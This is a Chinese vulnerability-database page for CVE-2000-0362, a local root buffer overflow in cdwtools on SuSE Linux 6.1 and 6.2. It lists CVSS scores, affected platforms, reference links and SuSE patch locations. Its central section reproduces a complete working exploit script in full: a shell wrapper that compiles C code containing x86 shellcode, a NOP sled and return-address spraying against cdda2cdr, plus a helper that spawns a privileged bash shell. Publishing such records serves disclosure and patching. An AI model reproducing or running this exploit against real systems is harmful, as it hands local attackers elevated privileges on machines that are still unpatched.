CVE-2000-0362
CVSS7.2
发布时间 :1999-10-22 00:00:00
修订时间 :2008-09-10 15:04:13
NMCOE    

[原文]Buffer overflows in Linux cdwtools 093 and earlier allows local users to gain root privileges.


[CNNVD]Linux cwdtools漏洞(CNNVD-199910-038)

        Linux cdwtools 093及早期版本存在缓冲区溢出漏洞。本地用户可以借助此漏洞获得根权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:suse:suse_linux:6.2SuSE SuSE Linux 6.2
cpe:/o:suse:suse_linux:6.1SuSE SuSE Linux 6.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0362
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0362
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199910-038
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/738
(UNKNOWN)  BID  738
http://www.novell.com/linux/security/advisories/suse_security_announce_25.html
(UNKNOWN)  SUSE  19991019 Security hole in cdwtools < 093

- 漏洞信息

Linux cwdtools漏洞
高危 缓冲区溢出
1999-10-22 00:00:00 2005-08-02 00:00:00
本地  
        Linux cdwtools 093及早期版本存在缓冲区溢出漏洞。本地用户可以借助此漏洞获得根权限。

- 公告与补丁

        S.u.S.E offers patched packages at the location below:
        ftp://ftp.suse.com/pub/suse/i386/update/6.1/ap1/cdwtools-0.93-101.i386.rpm
        ftp://ftp.suse.com/pub/suse/i386/update/6.2/ap1/cdwtools-0.93-100.i386.rpm
        ftp://ftp.suse.com/pub/suse/axp/update/6.1/ap1/cdwtools-0.93-101.alpha.rpm

- 漏洞信息 (19565)

S.u.S.E. Linux 6.1/6.2 cwdtools Vulnerabilities (EDBID:19565)
linux local
1999-10-22 Verified
0 Brock Tellier
N/A [点击下载]
source: http://www.securityfocus.com/bid/738/info

cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. 

--- cdda2x.sh ---
#! /bin/sh
#
# Shell script for Linux x86 cdda2cdr exploit
# Brock Tellier btellier@usa.net
#

cat > /tmp/cdda2x.c <<EOF

/**
 ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros)

 ** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz>
 ** 
 ** Brock Tellier btellier@usa.net 
 **/


#include <stdlib.h>
#include <stdio.h>

char exec[]= /* Generic Linux x86 running our /tmp program */
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/tmp/cd";



#define LEN 500
#define NOP 0x90

unsigned long get_sp(void) {

__asm__("movl %esp, %eax");

}


void main(int argc, char *argv[]) {

int offset=0;
int i;
int buflen = LEN;
long int addr;
char buf[LEN];

 if(argc > 3) {
  fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]);
 exit(0);
 }
 else if (argc == 2){
   offset=atoi(argv[1]);

 }
 else if (argc == 3) {
   offset=atoi(argv[1]);
   buflen=atoi(argv[2]);

 }
 else {
   offset=500;
   buflen=500;

 }


addr=get_sp();

fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n");
fprintf(stderr, "Brock Tellier btellier@usa.net\n");
fprintf(stderr, "Using addr: 0x%x\n", addr+offset);

memset(buf,NOP,buflen);
memcpy(buf+(buflen/2),exec,strlen(exec));
for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4)
 *(int *)&buf[i]=addr+offset;

execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL);


/*
for (i=0; i < strlen(buf); i++) putchar(buf[i]);
*/

}

EOF

cat > /tmp/cd.c <<EOF
void main() { 
    setregid(getegid(), getegid());
    system("/bin/bash");
}
EOF

gcc -o /tmp/cd /tmp/cd.c
gcc -o /tmp/cdda2x /tmp/cdda2x.c
echo "Note that gid=6 leads to easy root access.."
/tmp/cdda2x



		

- 漏洞信息

1123
Linux cwdtools cdda2cdr Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Upgrade
Vendor Verified

- 漏洞描述

- 时间线

1999-09-30 Unknow
1999-10-22 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站